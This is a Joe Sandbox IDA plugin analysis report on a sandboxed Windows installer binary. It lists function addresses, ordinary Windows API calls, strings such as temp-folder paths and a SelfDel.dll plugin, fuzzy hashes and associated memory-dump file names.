Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54

Function 00402711 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1

Part of subcall function 00406125: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026F6,00000000,00000000,?,00000000,00000011), ref: 0040613B

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D

Strings

9, xrefs: 00402760

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
Instruction ID: 94532b36e9b1b55a0417b46d3f551769048a354c57792839695d4204f468be83
Opcode Fuzzy Hash: 233c6f879122765c140ec07ecab3eee11d9f6e18c011ef8f82b6bc4890f14a46
Instruction Fuzzy Hash: D6510C75D04119AADF20EFD4CA84AAEBBB9FF44304F14817BE541B62D0D7B89D82CB58

Function 004055D9 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000,?), ref: 00405611
lstrlenW.KERNEL32(0040341A,007A0728,00000000,00798B00,74DF23A0,?,?,?,?,?,?,?,?,?,0040341A,00000000), ref: 00405621
lstrcatW.KERNEL32(007A0728,0040341A,0040341A,007A0728,00000000,00798B00,74DF23A0), ref: 00405634
SetWindowTextW.USER32(007A0728,007A0728), ref: 00405646
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566C
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405686
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405694

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
Instruction ID: 329114e2e26f34c588cdeed9baab55c5e37b8eaf8a8cec26a94c2fb3a39dc2c1
Opcode Fuzzy Hash: da048427165e3fda7d212e1d25adb62017d163fe0601bf1cc7e6f9066e197b12
Instruction Fuzzy Hash: F921B371900618BACF119F65DD449CFBFB8EF95364F10843AF908B22A0C77A4A50CFA8

Function 00406802 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,007B3000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406865
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406874
CharNextW.USER32(?,007B3000,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406879
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 0040688C

Strings

*?|<>/":, xrefs: 00406854
C:\Users\user\AppData\Local\Temp\, xrefs: 00406803

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4010320282
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD

Function 00404E8E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EA9
GetMessagePos.USER32 ref: 00404EB1
ScreenToClient.USER32(?,?), ref: 00404ECB
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EDD
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F03

Strings

f, xrefs: 00404EDF

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction ID: 20ba1dd8c6eb147b8de8e184d932bb38cbf2a2b27d4ef3642ae6e6b093867634
Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
Instruction Fuzzy Hash: D6015E72900219BADB00DB95DD85FFEBBBCAF95711F10412BBB51B61D0C7B49A018BA4

Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
MulDiv.KERNEL32(0028AF26,00000064,0028AF2A), ref: 00403001
wsprintfW.USER32 ref: 00403011
SetWindowTextW.USER32(?,?), ref: 00403021
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033

Strings

verifying installer: %d%%, xrefs: 0040300B

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58

Function 00402975 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
GlobalFree.KERNEL32(?), ref: 00402A2B
GlobalFree.KERNEL32(00000000), ref: 00402A3E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
Instruction ID: 5c013e3641f51b8511de27967d5ac64a9b846b719b0e1cdf51d049a21d65d460
Opcode Fuzzy Hash: c58995e68432e7249e988c80aa0e1a33c88a6fdfba4ce0329c84874909ba7ef0
Instruction Fuzzy Hash: 3D31B171D00128BBCF21AFA5CE4999E7E79AF45324F10423AF511762E1CB794D419F98

Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 9b286c5d8e76f57eb0c9cc6cf8757f48d710680964e76fdf16ae971aa0981de0
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 64215A7150010ABFDF129F90CE89EEF7A7DEB14398F110076B909B21A0D7B48E54AA64

Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401DBF
GetClientRect.USER32(?,?), ref: 00401E0A
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
DeleteObject.GDI32(00000000), ref: 00401E5E

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
Instruction ID: bf706e621430f2b8e1e8296bf8ea73d697ba0e02d4cfc8f60e3200fcd9798b2c
Opcode Fuzzy Hash: cdc72e7d50071940d3701a17f821f82d2e79ee15f88162b810cd40ac2d6ccfa8
Instruction Fuzzy Hash: 57212A72904119AFCB05DF94DE45AEEBBB5EB08300F14403AF945F62A0DB389D81DB98

Function 00401E73 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E76
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
ReleaseDC.USER32(?,00000000), ref: 00401EA9
CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction ID: 03fa82d4c3f414405e360d431a269216209ac9bc2718b2d324fdabe448a9bb24
Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
Instruction Fuzzy Hash: 28018471954250EFEB015BB4AE89BDD3FB4AF59301F10497AF142BA1E2CAB90444DB3D

Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0

Strings

!, xrefs: 00401CA4

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
Instruction ID: 31ba3c168d84f0c85bcad1357d39928db2ba622a9cc012c1a012c7db44d830b4
Opcode Fuzzy Hash: 35699d68b9303fa4031feacba475685dc7f5ed378d46c91e4d8d5602462f7f3c
Instruction Fuzzy Hash: 66218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98

Function 00404D80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(007A1748,007A1748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E21
wsprintfW.USER32 ref: 00404E2A
SetDlgItemTextW.USER32(?,007A1748), ref: 00404E3D

Strings

%u.%u%s%s, xrefs: 00404E0B

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
Instruction ID: afd2be291b2a15d2af8ae11ee91158e81c8ac3063311500d61ab43a3e8b0c9b4
Opcode Fuzzy Hash: 21d04326a64a20976fb5de8d07180004ad871368d5848da8d0db5094891019e4
Instruction Fuzzy Hash: 6F11E77360423837DB10996D9C45E9E3298DF85374F254237FA66F31D1EA79DC2182E8

Function 00405E23 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E29
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E33
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405E45

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD

Function 00402663 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll), ref: 004026BA

Strings

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp, xrefs: 004026A8
C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll, xrefs: 0040267E, 004026A3, 004026B5, 00402701

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1699103049.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KYagm8gq5S.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsiFE19.tmp$C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll
API String ID: 1659193697-2674119624
Opcode ID: ecb164bffedd8144fd574a38f4990260678b0e323410c3a48bf88ebac77fdc64
Instruction ID: 017f71272b68274a12e342b3970613002fe1d3414b89f7e2a3fd3533f9475010
Opcode Fuzzy Hash: ecb164bffedd8144fd574a38f4990260678b0e323410c3a48bf88ebac77fdc64
Instruction Fuzzy Hash: C7110D72A10206BBCB00BBB19F46AAE7B616F51748F20843FF502F61D1DAFD8851631E

Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040321C,00000001), ref: 00403051
GetTickCount.KERNEL32 ref: 0040306F
CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
ShowWindow.USER32(00000000,00000005), ref: 0040309A

Memory Dump Source

Source File: 00000000.00000002.1695845694.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1695794354.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1695872090.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696072059.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
